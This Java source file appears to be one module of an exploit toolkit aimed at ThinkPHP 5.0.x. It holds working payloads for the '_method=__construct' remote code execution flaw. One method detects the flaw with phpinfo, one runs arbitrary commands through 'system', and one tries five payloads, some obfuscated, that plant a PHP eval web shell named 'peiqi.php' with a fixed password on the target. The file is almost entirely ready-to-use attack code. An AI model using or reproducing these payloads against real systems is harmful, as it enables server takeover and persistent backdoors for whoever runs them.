package exploit;

import com.github.kevinsawicki.http.HttpRequest;
import util.BasePayload;
import util.Module;
import util.Result;

import java.util.ArrayList;

/**
 * Author 莲花 2021/6/15
 */
//ThinkPHP <= 5.0.13
public class tp5010 implements BasePayload {

    public Result checkVUL(String url) {
        String CheckStr = "PHP Version";
        Module m = new Module();
        String module = m.getModule(url);
        String payload_url = url + "/?s=" + module;

        ArrayList<String> payloads = new ArrayList<String>() {{
            add("_method=__construct&method=get&filter[]=phpinfo&get[]=-1");
            add("s=-1&_method=__construct&method=get&filter[]=phpinfo");
        }};

        for (String payload : payloads) {
            try {
                HttpRequest req = HttpRequest.post(payload_url).send(payload);
                if (req.body().contains(CheckStr)) {
                    return new Result(true, "ThinkPHP 5.0.10 construct RCE", payload_url + " Post: " + payload);
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
        return new Result(false, "ThinkPHP 5.0.10 construct RCE", "");
    }

    public Result exeVUL(String url, String cmd) throws Exception {
        Module m = new Module();
        String module = m.getModule(url);
        String payload_url = url + "/?s=" + module;
        String payload_rce = "s=" + cmd + "&_method=__construct&method&filter[]=system";
        try {
            String response = HttpRequest.post(payload_url).send(payload_rce).body();
            String res = response.substring(0, response.indexOf("<"));
            if (res.equals("")) {
                return new Result(true, "", response);
            }
            return new Result(true, "", res);
        } catch (Exception e) {
            e.printStackTrace();
        }
        return new Result(false, null, null);
    }


    public Result getShell(String url) throws Exception {
        Module m = new Module();
        String module = m.getModule(url);
        String payload_url = url + "/?s=" + module;

        ArrayList<String> payloads = new ArrayList<String>() {{
            add("_method=__construct&filter[]=system&mytest=echo '<?php @eval($_POST['peiqi'])?>' >>peiqi.php");
            add("_method=__construct&method=get&filter[]=assert&get[]=file_put_contents('./peiqi.php','<?php%20@eval($_POST[%27peiqi%27])?>');");
            add("_method=__construct&method=get&filter[]=assert&get[]=/*1111*//***/file_put_contents/*1**/(/***/'./peiqi.php',/***/'<?php%20@eval($_POST[%27peiqi%27])?>'/***/);');");
            add("s=file_put_contents('./peiqi.php','<?php%20@eval($_POST[%27peiqi%27])?>');&_method=__construct&method=&filter[]=assert");
            add("_method=__construct&method=get&filter[]=assert&get[]=copy('<?php%20@eval($_POST[%27peiqi%27])?>', './peiqi.php');");
        }};
        for (String payload : payloads) {
            try {
                String res = HttpRequest.post(payload_url).send(payload).body();
                int code = HttpRequest.get(url + "/peiqi.php").code();
                if (code == 200) {
                    return new Result(true, "", url + "/peiqi.php   Pass:peiqi");
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
        return new Result(false, null, null);
    }

}
